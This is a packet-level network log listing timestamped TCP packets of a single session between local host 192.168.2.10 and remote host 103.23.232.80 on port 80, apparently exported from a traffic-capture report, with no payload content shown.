Apr 4, 2024 17:49:07.229686022 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.229692936 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.229729891 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.229747057 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.229765892 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.229782104 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.229800940 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.229836941 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.229844093 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.229856014 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.229875088 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.229891062 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.229891062 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.229927063 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.229944944 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.229964972 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.229981899 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.230000019 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.230051041 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230071068 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230088949 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230092049 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.230103970 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.230108023 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230122089 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.230127096 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230138063 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.230151892 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230165005 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.230190992 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.230190992 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230210066 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230226994 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.230241060 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.230245113 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230263948 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230281115 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230282068 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.230302095 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.230300903 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230314970 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.230320930 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230336905 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.230354071 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.230357885 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230387926 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.230410099 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230428934 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230444908 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.230448961 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230460882 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.230475903 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230492115 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230504990 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.230529070 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.230561018 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230578899 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230611086 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.230613947 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230633020 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230664015 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.230700970 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230726004 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230732918 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230736971 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.230745077 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230761051 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.230765104 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230783939 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.230808020 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.230807066 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230824947 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230844021 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230858088 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.230858088 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.230875015 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.230882883 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230904102 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230918884 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230931997 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.230937958 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.230957985 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.230981112 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.230994940 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231009960 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231024981 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.231025934 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231041908 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.231055975 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.231096029 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231113911 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231128931 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.231133938 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231153011 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231154919 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.231165886 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.231179953 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231183052 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.231220007 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231239080 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231242895 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.231257915 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231260061 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.231273890 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.231277943 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231295109 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.231308937 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.231336117 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231350899 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231369972 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231389999 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.231410027 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231411934 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.231426001 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231437922 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.231445074 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231456995 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.231477022 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.231482983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231518984 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231523037 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.231550932 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.231555939 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231595039 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.231612921 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231631994 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231651068 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.231664896 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.231668949 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231698990 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231734037 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231735945 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.231745005 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.231756926 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231770039 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.231776953 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231794119 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.231813908 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.231836081 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231853962 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231873035 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231890917 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231894970 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.231915951 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.231915951 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231935978 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231939077 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.231956005 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231959105 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.231976032 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.231976032 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.231987953 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.232001066 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232017994 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.232021093 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232033968 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.232050896 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.232108116 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232125044 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232145071 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232147932 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.232165098 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232171059 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.232183933 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232187986 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.232203007 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232206106 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.232227087 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.232233047 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232238054 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.232249022 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232285023 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232285976 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.232305050 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232321978 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232336998 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.232341051 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232356071 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.232379913 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.232395887 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232414007 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232429028 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.232433081 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232445002 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.232462883 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.232472897 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232487917 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232501030 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.232506990 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232521057 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.232526064 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232537985 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.232544899 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232557058 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.232578993 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.232600927 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232620001 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232637882 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232652903 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.232675076 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.232692003 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232711077 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232728958 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232744932 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.232749939 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232767105 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.232769012 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232790947 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.232808113 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.232809067 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232826948 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232846022 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232858896 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.232881069 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232882023 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.232901096 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232935905 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.232935905 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.232969046 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233002901 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.233004093 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233022928 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233025074 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.233042955 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.233042955 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233062029 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233066082 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.233081102 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.233088970 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233097076 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.233117104 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.233156919 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233175039 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233211994 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.233234882 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233251095 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233273983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233289957 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.233293056 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233304977 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.233329058 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.233366966 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233386040 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233400106 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.233406067 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233416080 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.233441114 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.233448982 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233465910 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233479977 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.233485937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233496904 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.233506918 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233520031 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.233525991 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233539104 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.233556032 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.233580112 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233597994 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233617067 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233630896 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.233637094 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233654022 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.233675957 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233679056 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.233705044 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.233726978 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233747005 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233763933 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.233781099 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.233803988 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233819008 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233838081 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233856916 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233856916 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.233876944 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233880043 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.233906031 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.233917952 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.233917952 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233935118 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.233973980 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.234000921 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.234019995 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.234057903 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.234087944 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.234143972 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.234159946 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.234179020 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.234191895 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.234200001 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.234234095 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.234268904 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.234302044 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.234302044 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.234339952 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.234340906 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.234376907 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.234379053 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.234416008 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.234452963 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.234472036 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.234488964 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.234489918 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.234503031 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.234508991 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.234524012 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.234528065 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.234544039 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.234548092 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.234560013 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.234566927 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.234586000 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.234586954 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.234599113 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.234616041 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.234622002 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.234639883 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.234658957 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.234679937 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.234694958 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.234702110 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.234735012 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.234752893 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.234771013 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.234788895 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.234790087 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.234806061 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.234812021 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.234821081 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.234838963 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.234849930 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.234869957 CEST	80	49730	103.23.232.80	192.168.2.10
